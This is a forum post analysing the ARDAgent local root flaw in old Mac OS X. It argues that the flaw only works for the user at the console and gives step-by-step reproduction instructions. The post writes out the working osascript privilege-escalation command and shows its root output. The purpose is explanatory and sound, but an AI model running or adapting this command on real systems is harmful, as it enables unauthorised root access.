Quote:
Originally Posted by Luca
It appears as though entering a simple command in Terminal will grant any user root access, and this vulnerability affects fresh OS X installations right out of the box.
|
I just want to quote this to boil down my other two posts. As written, this is a gross overstatement (simply because of how it reads). It will only grant root access to:
Quote:
The user who is currently logged in at the console (physical machine).
|
That could be "any user," yes, but you have to meet a fairly stringent set of requirements to take advantage of this (in the scheme of the remote exploit, security-conscious Internet world). And depending on who's got the console, it may not work even if you have
ssh access.
EDIT II: also, if the system is sitting at the Login Window, then
nobody can exploit this, since no unprivileged user actually has console access. You can see that
/dev/console is owned by root until someone logs in, so you'd have need root access to exploit this in that case. In which case it's not much of an exploit.
---
EDIT: Quick steps to verify that I'm not Full Of Crap™:
- Make sure "Remote Login" is enabled in the Sharing preference pane.
- Make sure "Fast User Switching" is enabled in the Accounts preference pane.
- Make sure "Guest Account" is enabled for "Login" in the Accounts preference pane.
- Open Terminal.app, and run the offending command:
Code:
osascript -e \
'tell application "ARDAgent" to do shell script "whoami"'
Which outputs:
Code:
root
- Open a ssh session:
Code:
ssh <user>@localhost
- Run the offending command again. It should succeed, as expected.
- Now, Fast User Switch to the Guest account (this will take a few seconds).
- Open Terminal.app again.
- Open a ssh session again:
Code:
ssh <user>@localhost
- Run the offending command once more. THIS WILL FAIL because Guest now owns the console, not your original user. This will output something akin to:
Code:
_RegisterApplication(), FAILED TO establish the default connection
to the WindowServer, _CGSDefaultConnection() is NULL.
31:55: execution error: ARDAgent got an error: "whoami" doesn’t
understand the do shell script message. (-1708)
---
Sorry for posting in such quick succession; it just really irks me when I see stuff like this that seems poorly researched. For example, the original poster probably has no idea under what conditions said exploit would actually work (simply a "works for me" attitude). And s/he has no idea/notion that Apple may not be able to fix the root cause (at least not in a security update). And the articles I've seen on this are more interested in big publicity and "OMG Mac OS X sEcURiTy HoLeZ" than examining the technical minutia involved.
Not your fault
Luca, I just thought all of this when it hit Slashdot / elsewhere, but didn't feel like blathering on with technical details to either fanbois or haters that wouldn't care either way. You got the information treasure trove.